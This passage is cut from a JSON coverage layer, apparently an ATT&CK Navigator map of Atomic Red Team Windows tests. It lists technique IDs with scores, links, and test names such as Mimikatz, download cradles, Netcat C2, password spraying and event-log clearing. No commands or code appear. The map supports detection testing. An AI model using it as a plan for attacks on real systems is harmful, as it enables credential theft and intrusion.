PowerShell\n- RunPE via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":4,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":32,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Obfuscation Tests\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- PowerShell Downgrade Attack\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":5,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":13,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":16,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":17,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":3,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":4,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":48,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":6,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":3,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":4,"enabled":true,"comment":"\n- Chrome (Developer Mode)\n- Chrome (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":74,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View 